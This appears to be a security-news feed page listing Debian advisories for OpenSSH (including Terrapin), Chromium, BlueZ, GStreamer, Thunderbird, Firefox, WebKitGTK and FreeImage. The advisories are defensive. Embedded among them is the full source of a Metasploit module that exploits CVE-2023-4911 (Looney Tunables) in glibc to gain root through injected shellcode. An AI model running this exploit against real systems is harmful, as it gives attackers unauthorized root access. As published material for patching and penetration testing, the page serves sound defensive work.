Debian Linux Security Advisory 5586-1 - Several vulnerabilities have been discovered in OpenSSH, an implementation of the SSH protocol suite.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5586-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 22, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openssh  
CVE ID         : CVE-2021-41617 CVE-2023-28531 CVE-2023-48795 CVE-2023-51384  
                 CVE-2023-51385  
Debian Bug     : 995130 1033166

Several vulnerabilities have been discovered in OpenSSH, an  
implementation of the SSH protocol suite.

CVE-2021-41617

    It was discovered that sshd failed to correctly initialise  
    supplemental groups when executing an AuthorizedKeysCommand or  
    AuthorizedPrincipalsCommand, where a AuthorizedKeysCommandUser or  
    AuthorizedPrincipalsCommandUser directive has been set to run the  
    command as a different user. Instead these commands would inherit  
    the groups that sshd was started with.

CVE-2023-28531

    Luci Stanescu reported that a error prevented constraints being  
    communicated to the ssh-agent when adding smartcard keys to the  
    agent with per-hop destination constraints, resulting in keys being  
    added without constraints.

CVE-2023-48795

    Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that  
    the SSH protocol is prone to a prefix truncation attack, known as  
    the "Terrapin attack". This attack allows a MITM attacker to effect  
    a limited break of the integrity of the early encrypted SSH  
    transport protocol by sending extra messages prior to the  
    commencement of encryption, and deleting an equal number of  
    consecutive messages immediately after encryption starts.

    Details can be found at https://terrapin-attack.com/

CVE-2023-51384

    It was discovered that when PKCS#11-hosted private keys were  
    added while specifying destination constraints, if the PKCS#11  
    token returned multiple keys then only the first key had the  
    constraints applied.

CVE-2023-51385

    It was discovered that if an invalid user or hostname that contained  
    shell metacharacters was passed to ssh, and a ProxyCommand,  
    LocalCommand directive or "match exec" predicate referenced the user  
    or hostname via expansion tokens, then an attacker who could supply  
    arbitrary user/hostnames to ssh could potentially perform command  
    injection. The situation could arise in case of git repositories  
    with submodules, where the repository could contain a submodule with  
    shell characters in its user or hostname.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:8.4p1-5+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:9.2p1-2+deb12u2.

We recommend that you upgrade your openssh packages.

For the detailed security status of openssh please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/openssh

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWFTwlfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0S6PRAAkBJzc/CFQgXLtms7bom/Vw750vvqEVhj7ojOPHbmpoppVIjFR768C5Z6  
AO5HiP/uH1tk0x2zejbPhXRgLK/2PEuCTA/4w7UeTzYIGve3IVKVgNs+/sgWQBuK  
M1xj8zL1PLkRi6rSXAvGpTxqdCtWC61AWHOl1Q03w3usilETJKDsulOBb9sQ9Uid  
xSRxDUAS//gyRdW+K3D9HsPYJAW/oSu4tJO+UXI1WJTDY1N/i0cq7yH16YXzbEcV  
dhttLyR5fWx000fSsaaWXgYUS2sSYUfOKPfw4xdePpdeBYNumnpehjfCED5C61EQ  
os4uvEDi15X8M599/+u0oLVJJFXVSfZ4W1ecFWcFAvMny70F0s1a7AxQCcN3sXkt  
kLAuOXJHmmhBeqSj1kVKoLcg4WSlCdglRr6KgiXqUVvfUBsWhseoyGJ3jST3PQcZ  
70/lIJofavLJdFQHlPTXs7lDnFttgzuB3xE5wM7TeXs5L2l9QI0W64YCtWthqApL  
c7KjPGmAx7xYOOp+aHclsP74nBVZs6tcvHPf9Y/1OK30XkoMbuW0+oH1rCu6EGs0  
F6Th1FneTwRN2NEhzpQMr+34m0T8H7oymiQmi9C+ZDhCBDRcpN4sATYNh70Y/t6y  
i8k/vZcCCfLxQgdiay5JJCWJPf1pvvmPbgMLs4WVELr/6E9xIR0=2W//  
-----END PGP SIGNATURE-----

Debian Security Advisory 5586-1

Debian Linux Security Advisory 5585-1 - An important security issue was discovered in Chromium, which could result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5585-1                   security@debian.org  
https://www.debian.org/security/                           Andres Salomon  
December 21, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-7024

An important security issue was discovered in Chromium, which could result  
in the execution of arbitrary code.

Google is aware that an exploit for CVE-2023-7024 exists in the wild.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 120.0.6099.129-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 120.0.6099.129-1~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmWEtBwACgkQZF0CR8Nu  
djcwTRAAlSOMympmaRnt7wtj/PasL1BjxHxalhGYU5KxKugz8BmDZN2j+ulLg2c9  
SoJQCIT3RhUyNbWyZV3WKXjSBkn3kE4G/lplL9AIDTHAfy4yrqUo41ews7DMfPQ4  
oNVJhIqIGl+VTaX1zaH50hXJI2Ax294Uo986iGplWScYqnlkcWLNX5RWOtYQLrR7  
BjYzEFIoDouuF5w+7nXyy3nDJYeaBotz1eifayEVYul0k55ljGftzkW5EVrS8zVF  
MeSz0YrXNpqlV6SREVg6jouZxJdNUE1+X72j+dK9rAwR4gcZekcd1JOO+oFfRv86  
jwb3ui8oB3ZJ8K0EPswWK7trq/rFra2T50YvP4wpbwtQ5RG99z612cCgeHZYuLLY  
WW3qWK20lKWbhCwP2S7KXuNFZpVu2ddvj+y4MqMS16HlQyobvQR8obUpwtK1YZSe  
Ak88vaCUk/3ZrFSSggxQQIgSBKtWTLcL7wons5RELGrrowmGZPS+ajpsWtAvGlhJ  
S+QZWkpKlW2F92cl1md7R5zN5vAeVQqW6w20eDebbk4HLgGv6wqgEVNyRcQXUKh/  
3GqGvbuPAoo+gVqGybr+Efmb/xnZn2Y7/AbmjatjA3Iq2Z+NJNUBVahXeZ1s4b5U  
SuvktcJ0szrqOPYNNBkx35/5rSy6nb1KoStG4lvX8XMMese5Ty8=xniE  
-----END PGP SIGNATURE-----

Debian Security Advisory 5585-1

Debian Linux Security Advisory 5584-1 - It was reported that the BlueZ's HID profile implementation is not inline with the HID specification which mandates the use of Security Mode 4. The HID profile configuration option ClassicBondedOnly now defaults to "true" to make sure that input connections only come from bonded device connections.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5584-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 21, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : bluez  
CVE ID         : CVE-2023-45866  
Debian Bug     : 1057914

It was reported that the BlueZ's HID profile implementation is not  
inline with the HID specification which mandates the use of Security  
Mode 4.  The HID profile configuration option ClassicBondedOnly now  
defaults to "true" to make sure that input connections only come from  
bonded device connections.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 5.55-3.1+deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 5.66-1+deb12u1.

We recommend that you upgrade your bluez packages.

For the detailed security status of bluez please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/bluez

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWElXhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qbdw/+Ly8+kB39iFkiQiFluySzb1mPvYHz0RBYx5aa8iLhWU6SuuZwFGv1ZNTf  
r16whtZOmBGYPDjJrRbksd01rNxIlwW8jaNPCOiDySYqrw3Ni0cbWRYrtNSjzOYJ  
cwoPg+4OYEiY+0HkAuTaAfctD5Nyf6sIN2dMsy3VERxZAlRFMUElAVn2obhRoW3P  
VtQHfVsedGcVsmxHS72MnXIEBYhFu9Q+lA80qfteiPBnQUFo41DeV1ar1uGBhDWG  
qwkl+8+etRYhnLMnX361Hd+5eVAC8IIQQaFR+5lfq7VydIcDcV2gpENOxNj4G3T1  
TSJ+ts6BX9BSuPVXFckymid71bbUJ+1r/IpvA8nlc+UIDTPmpZygijohMkjOpuNH  
kwkPVuRNmOAH6/umh7auZn5donXaPA8k303EUvaMNpGxfmD3jxdLsDwrrE/qRtGv  
kPCV67y0N6ZaN1d8wxuIcQ4aiQVAgNlmi9hhAfYhhhdt3y/oGcqMT2iUPQIla3Wj  
sWRUYt8mTcZdG2g00WBj+DTh0EuUwd9ILYPfSK+zWf+ikQ1+LrQvfVEMD1ejWmIg  
QI6vxwN9wiim9PydlAbtlsQ4vb/246MPuWbXcRS3omW3CvK86i0GpSVvpjrr2DmB  
pQ4rYr6bFcVINzLr79lz5GMGIpuShCllrtLkXofyfhinvNthKZs=DXXJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5584-1

Debian Linux Security Advisory 5583-1 - A buffer overflow was discovered in the AV1 video plugin for the GStreamer media framework, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5583-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
December 21, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gst-plugins-bad1.0  
CVE ID         : not yet available

A buffer overflow was discovered in the AV1 video plugin for the  
GStreamer media framework, which may result in denial of service or  
potentially the execution of arbitrary code if a malformed media file  
is opened.

The oldstable distribution (bullseye) is not affected.

For the stable distribution (bookworm), this problem has been fixed in  
version 1.22.0-4+deb12u4.

We recommend that you upgrade your gst-plugins-bad1.0 packages.

For the detailed security status of gst-plugins-bad1.0 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gst-plugins-bad1.0

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWEkCMACgkQEMKTtsN8  
TjZOGQ/+P4p0HpeYQLjyb0UwvQ8XuLMd0BHI9AeBXAAvm2apCwIALqqTeMZ86YId  
XE/QiVqFccIMJ4GiyQyiSZLcS9py9RDLzw/y3pefi8n1gZdfLBJEvJtlYsPV0FD2  
/a71aMG2hHqK2ez45mvsLJmGbanBaslC6cbJ5+/Y8psWBDq28VYEp3Zb5HnuHy2U  
7lZIpZ1cQeChaE7ef+Qbnep6c8Lxyjf4fyBj2K5PqgsFuxqwCzzkPQDDA6A5AAUI  
DsdA27iTthBAOKjFJvh3TPuEdnFtMZghsYo0YU8OoJl47/gJhx36gFFivyudWYKN  
IHxOVbyNsmAphUDfwUyJUxKKbcFgx59AvTNSD2v2N7ulehYIN3GWjRgLtm30HX45  
fPMhzoVQJHTBLmqtUviKc9pJPPV4bctt82p5iuCQ8DZHHImtYsJQbbBzzpjtv9DA  
zXRp/XyJoZwCLuIvwvcc0kYMo0E7CkGFHWfMJvVFmAkokc4N1bw3F/PEolhrlXwE  
Kx25Zif6HlX2QR7ReADL/fe9JdJqGYjLkq9KXHteg4VLpBx6cB+6Wcie76ONeA5C  
MWzancxEwMN2gSXymwB7gAtA3dKA2Dct34Gm0rdnRVR2Iafy4YyaIVbszUvHX5XB  
LHTHg0UNz7plbefH3kPBVCCz/G/AwHeK0DNusO8HNIwQAVZyV60m0j  
-----END PGP SIGNATURE-----

Debian Security Advisory 5583-1

Debian Linux Security Advisory 5582-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service, the execution of arbitrary code or spoofing of signed PGP/MIME and SMIME emails.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5582-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 21, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2023-6856 CVE-2023-6857 CVE-2023-6858 CVE-2023-6859                 CVE-2023-6860 CVE-2023-6861 CVE-2023-6862 CVE-2023-6864                 CVE-2023-6873 CVE-2023-50761 CVE-2023-50762Multiple security issues were discovered in Thunderbird, which couldresult in denial of service, the execution of arbitrary code or spoofingof signed PGP/MIME and SMIME emails.For the oldstable distribution (bullseye), these problems have been fixedin version 1:115.6.0-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 1:115.6.0-1~deb12u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWEkCEACgkQEMKTtsN8TjYB8xAAiSFGWOK6s+7YGuc28bu4EEUHG2sUXJ9g43AD9DftxhVlz1fh2GbyXxpLDyoq3rrZU3n8bVQTWLcfRcdLYOZlMNEaxN8K89lGRfh+864anLQIGGII3gsCC8qS3Wx96W9Ydh4++iM55Yopc9SNAFKUKXONYU8dxolSYsDAwkhw4iU97TjURsImOTzmnpyAIvVbG7Uf3HEnyb98KRr8OgbzdkJpg/JFKj5NLxX8QJ1kKpV9/8uYKRxdehNhljlYXt2j5fqaL1jXXcOMkEuMgXjUl5Hq2dh6owEPkfHDRMMLLypsuCXDz+i4mAyYQGgrdNYshf876OT4cmf2O3d/lXExWdcALWGRd3/tLSB7KIoRUtit/+OZT6/jVvSjr4g4vfQvQHC7JlvUmrglmKrHQ3J4b0TEeMN3GIrUadMFSVG2C8pfS23e91AtF6Jyeg00ZvP8/voUiHWymJTgJesDxHsHK1ZRMqulaIHwNuS+DieOW2mqNmb/exuJ4v35XwIFCrMBzmOkxDrfdiSLciXA2+qcdKW7QM+hK2hEzZBaw31OHgHTPZwzd2sMx9UDrKaejR/xKIMRgscqQcdISdsQTCmbFO98/iyiUXUF+j+itvdqrnaAn8ZEMtPj1dm54YzDuuZrWDrQ/IYxUz66x7NzQFAZKJc41toPY3u5aIx+lXOQZyAÛG4-----END PGP SIGNATURE-----

Debian Security Advisory 5582-1

A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. It has been dubbed Looney Tunables. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when launching binaries with SUID permission to execute code in the context of the root user. This Metasploit module targets glibc packaged on Ubuntu and Debian. Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911 however this module does not target them.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  # includes: is_root?  include Msf::Post::Linux::Priv  # includes: kernel_release  include Msf::Post::Linux::Kernel  # include: get_sysinfo  include Msf::Post::Linux::System  # includes writable?, upload_file, upload_and_chmodx, exploit_data, cd  include Msf::Post::File  # includes register_files_for_cleanup  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  BUILD_IDS = {    '69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,    '3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,    'a99db3715218b641780b04323e4ae5953d68a927' => 561,    'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,    '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,    '9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,    'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,    '956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322  }  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',        'Description' => %q{          A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES          environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when          launching binaries with SUID permission to execute code in the context of the root user.          This module targets glibc packaged on Ubuntu and Debian. The specific glibc versions this module targets are:          Ubuntu:          2.35-0ubuntu3.4 > 2.35          2.37-0ubuntu2.1 > 2.37          2.38-1ubuntu6 > 2.38          Debian:          2.31-13-deb11u7 > 2.31          2.36-9-deb12u3 > 2.36          Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911          however this module does not target them.        },        'Author' => [          'Qualys Threat Research Unit', # discovery          'blasty <peter@haxx.in>', # PoC          'jheysel-r7' # msf module        ],        'References' => [          ['CVE', '2023-4911'],          ['URL', 'https://haxx.in/files/gnu-acme.py'],          ['URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],          ['URL', 'https://ubuntu.com/security/CVE-2023-4911']        ],        'License' => MSF_LICENSE,        'Platform' => [ 'linux', 'unix' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'DefaultTarget' => 0,        'DefaultOptions' => {          'PrependSetresgid' => true,          'PrependSetresuid' => true,          'WfsDelay' => 600        },        'DisclosureDate' => '2023-10-03',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_advanced_options([      OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])    ])  end  def find_exec_program    %w[python python3].select(&method(:command_exists?)).first  rescue StandardError => e    fail_with(Failure::Unknown, "An error occurred finding a version of python to use: #{e.message}")  end  def check    glibc_version = cmd_exec('ldd --version')&.scan(/ldd\s+$\w+\s+GLIBC\s+(\S+)$/)&.flatten&.first    return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version    sysinfo = get_sysinfo    case sysinfo[:distro]    when 'ubuntu'      # Ubuntu's version looks like: 2.35-0ubuntu3.4. The following massaging is necessary for Rex::Version compatibility      test_version = glibc_version.gsub(/-\d+ubuntu/, '.')      if Rex::Version.new(test_version).between?(Rex::Version.new('2.35'), Rex::Version.new('2.35.3.4')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.37'), Rex::Version.new('2.37.2.1')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.38'), Rex::Version.new('2.38.6'))        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")      end    when 'debian'      # Debian's version looks like: 2.36-9+deb12u1. The following massaging is necessary for Rex::Version compatibility      test_version = glibc_version.gsub(/\+deb/, '.').gsub(/u/, '.').gsub('-', '.')      if Rex::Version.new(test_version).between?(Rex::Version.new('2.31'), Rex::Version.new('2.31.13.11.7')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.36'), Rex::Version.new('2.36.9.12.3'))        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")      end    else      return CheckCode::Unknown('The module has not been tested against this Linux distribution')    end    CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")  end  def check_ld_so_build_id    # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so    if !command_exists?('file')      print_warning('Unable to locate the `file` command ti  order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')      return    end    file_cmd_output = ''    # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not    # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.    sysinfo = get_sysinfo    case sysinfo[:distro]    when 'ubuntu'      if command_exists?('ldconfig')        file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')      end    when 'debian'      file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')    else      fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')    end    if file_cmd_output =~ /BuildID\[.+\]=(\w+),/      build_id = Regexp.last_match(1)      if BUILD_IDS.keys.include?(build_id)        print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")      else        fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")      end    else      print_warning('Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')    end  end  def exploit    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?    python_binary = find_exec_program    fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary    vprint_status("Using '#{python_binary}' to run the exploit")    check_ld_so_build_id    # The python script assumes the working directory is the one we can write to.    cd(datastore['WritableDir'])    shell_code = payload.encoded.unpack('H*').first    exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py')    exploit_data = exploit_data.gsub('METASPLOIT_SHELL_CODE', shell_code)    exploit_data = exploit_data.gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))    # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully    output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")    if output.blank?      print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')    else      print_line(output)    end  endend

Glibc Tunables Privilege Escalation

Debian Linux Security Advisory 5581-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, sandbox escape or clickjacking.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5581-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 20, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-6856 CVE-2023-6857 CVE-2023-6858 CVE-2023-6859                  CVE-2023-6860 CVE-2023-6861 CVE-2023-6862 CVE-2023-6863                  CVE-2023-6864 CVE-2023-6865 CVE-2023-6867Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, sandbox escape or clickjacking.For the oldstable distribution (bullseye), these problems have been fixedin version 115.6.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.6.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWDPxAACgkQEMKTtsN8TjYfeRAAql+aZ6PpAM1Fq4Cp1IlvDQc8BYNuKrjn9/4xYgq/bAnQyRGj1I0viHP2dUdZl6CcndqE6NVgm1mYpCQ/TZJpwSSxnoXf46bB/lGNg17Cw7T8gWI5uUSs1K63UOYNMr8HlCF35qZpU0+TrsL+q3qRdkOQOxRLSFHNhxuUQ+44pUJYKDVg6vKjHU91oQEfjzmcgn2Z+tL/zyrt4s57XUGpZNm6Vmg/TUftXL5+CDodCNPRnIw0JBYWu2yfJ3tj6cuCw6jDAcAouAsDcd8CbK28Bf6h2zUossRGVjSfNWeoshK2qe9L3/wlQB62s0wrJ1MimP9k1y9xS4Iy85vf2BDDnVQBNgMR8mKnwt63Jhngpx8JW8oTbBKzx1oiEZkShw3CDWuCx7ooMnR8glwybPJqXMyZbt8H7dMO3IFEwD2dfNzVfwyEUq4JAOzCPasLEwCekXrTTxeZoYdTW4y8c5c4GEd9nvO8Hdk9iV/zbD1uhpgy0g6oQXciAzSH6Rm92u2+HPwNOFjZAJMOi9eyqtdj9PqwHZ1uraXhtqCz8peD/Sg+YZCAXt0lLyVM+WbQqJOyH5n1POeEHbEikv1iMLXRw+Vkkbzr3u9laTdQ9Yn1b/ZfVblG6/N+hhlLLXYBXyYfrU4L6DMTnUave299Cq1fb8RPWVefcqAv6DoQX0P1GHc==8/zE-----END PGP SIGNATURE-----

Debian Security Advisory 5581-1

Debian Linux Security Advisory 5580-1 - The Zoom Offensive Security Team discovered that processing a SVG image may lead to a denial-of-service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5580-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
December 18, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-42883

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-42883

    The Zoom Offensive Security Team discovered that processing a SVG  
    image may lead to a denial-of-service.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.42.4-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.42.4-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmWAmlsACgkQAAyEYu0C  
2AKE4A/+K1bfikREQtpbuNTEDrurBYkeeCHK3hVTbj3s+x9E2LXfPDhgGMq42a5y  
Mfy8+cKeSXAFrWUEOCcJ73Ws05xNJamNclzfDiQGxJlSRombZXM1XROtyvFy3gUc  
nwWANsA8mPMfK22cZ7M/jQglyHlxIVQSbI18qDSxAN7Golo3bvve8zgtTL9phbLK  
qaGC0jw4r3BbQNnQxwJJiSi4B+JdNIalWYuiRZQGoZqTrpqY9fFbpmP1N2JP32fN  
rCPbFMN2YoLTdfALTmLKp4Hd88QdjFMj+DS7+0Lp1J40z3mfOODJIlybUcMKlbI8  
VWAZx3uhQxylzC9iWFkA99Igfc9mQdlvpOHMOgRaSYkeI3Ymp9im/GCn7/MylwhL  
BKmQS08+1s0qI8st8+rGwkCiCJdeA8pZonjvXGhsSYFWtODrFUwGwf+F1AbzaMOy  
ylwC2IawL13g8ruVlCwRtyKZctyGLYmOzjka2uq6AkIzMmaPujVwh9uYVv5iW/UX  
PedPlod5TacMnanjNLQDG+ZiEaHU/2P3kxRwW3nMmnS/H+3wYkPMOIqXDwTxw5kv  
woaTc8zCJHcHZ90HfRjKsZqlrTORjeleTPrdKWvjCyoyMkWDftOuLYh/YXek0Etr  
Cud+gmpHgK6BS5pRd/Ctx1P9a+DEQelau61m/Kib4QPTXRa8/K4=  
=afkP  
-----END PGP SIGNATURE-----

Debian Security Advisory 5580-1

Debian Linux Security Advisory 5579-1 - Multiple vulnerabilities were discovered in FreeImage, a support library for graphics image formats, which could result in the execution of arbitrary code if malformed image files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5579-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 17, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : freeimageCVE ID         : CVE-2020-21427 CVE-2020-21428 CVE-2020-22524Multiple vulnerabilities were discovered in FreeImage, a support libraryfor graphics image formats, which could result in the execution ofarbitrary code if malformed image files are processed.For the oldstable distribution (bullseye), these problems have been fixedin version 3.18.0+ds2-6+deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 3.18.0+ds2-9+deb12u1.We recommend that you upgrade your freeimage packages.For the detailed security status of freeimage please refer toits security tracker page at:https://security-tracker.debian.org/tracker/freeimageFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP 